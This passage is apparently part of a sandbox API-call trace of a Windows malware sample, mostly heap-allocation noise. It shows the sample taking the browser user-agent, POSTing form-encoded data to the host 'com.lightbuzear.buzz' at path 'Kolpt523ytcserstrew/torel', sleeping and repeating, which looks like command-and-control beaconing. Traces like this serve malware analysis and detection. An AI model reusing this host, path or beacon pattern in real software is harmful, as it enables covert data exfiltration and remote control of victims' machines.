(HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0247.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0247.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0247.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0247.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0247.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0247.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0247.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0247.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0247.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0247.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a58 [0247.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0247.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0247.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a58 | out: hHeap=0x4780000) returned 1 [0247.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0247.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0247.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815a58 [0247.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800bb8 [0247.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0247.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0247.892] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0247.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815878 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815938 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815878 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800c80 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0247.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c80 | out: hHeap=0x4780000) returned 1 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800eb0 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0247.893] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ed8 [0247.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0247.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0247.894] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0247.894] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0247.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ed8 | out: hHeap=0x4780000) returned 1 [0247.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0247.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0247.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0247.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0247.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0247.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0247.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0247.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815968 [0247.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0247.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800b40 [0247.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0247.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800b40 | out: hHeap=0x4780000) returned 1 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800b40 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0247.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ed8 [0247.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0247.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0247.896] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0247.896] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0249.085] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ed8 | out: hHeap=0x4780000) returned 1 [0249.085] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0249.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0249.086] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0249.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0249.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0249.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0249.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0249.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0249.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0249.086] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0249.086] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0249.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0249.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0249.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0249.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0249.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0249.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0249.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0249.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800dc0 [0249.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0249.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0249.087] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0249.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c80 [0249.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0249.087] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800dc0 [0249.088] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0249.088] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0249.089] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0249.090] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0249.090] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0249.091] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815878 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815878 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800dc0 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0249.091] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0249.091] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800b68 [0249.092] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0249.092] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a78 [0249.092] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0249.092] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0249.093] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0249.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0249.093] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a78 | out: hHeap=0x4780000) returned 1 [0249.093] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0249.094] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0249.094] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0249.094] FreeLibrary (hLibModule=0x71570000) returned 1 [0249.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0249.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0249.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0249.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f00 | out: hHeap=0x4780000) returned 1 [0249.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e38 | out: hHeap=0x4780000) returned 1 [0249.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f50 | out: hHeap=0x4780000) returned 1 [0249.096] Sleep (dwMilliseconds=0x2710) [0249.214] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0249.214] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0249.214] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0249.214] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0249.214] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0249.214] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0249.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0249.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0249.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0249.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815830 [0249.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0249.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0249.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0249.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0249.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0249.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815830 [0249.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800bb8 [0249.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0249.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0249.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0249.216] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0249.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0249.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0249.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0249.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0249.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0249.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0249.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0249.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0249.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0249.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0249.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0249.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815860 [0249.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0249.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0249.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815860 | out: hHeap=0x4780000) returned 1 [0249.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800bb8 [0249.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0249.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0249.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0249.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c08 [0249.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0249.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800bb8 [0249.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0249.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0249.218] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0249.218] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0249.218] FreeLibrary (hLibModule=0x71780000) returned 1 [0249.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0249.218] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0249.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800dc0 [0249.218] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0249.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0249.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0249.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0249.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a10 [0249.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815860 [0249.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a10 | out: hHeap=0x4780000) returned 1 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0249.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815860 | out: hHeap=0x4780000) returned 1 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815a10 [0249.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e38 [0249.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e38 | out: hHeap=0x4780000) returned 1 [0249.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0249.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e38 [0249.220] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0249.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ed8 [0249.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0249.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0249.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0249.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0249.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0249.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0249.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0249.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0249.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0249.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815968 [0249.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0249.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0249.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0249.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0249.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0249.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815878 [0249.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800bb8 [0249.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0249.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0249.221] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0249.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0249.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0249.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0249.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) 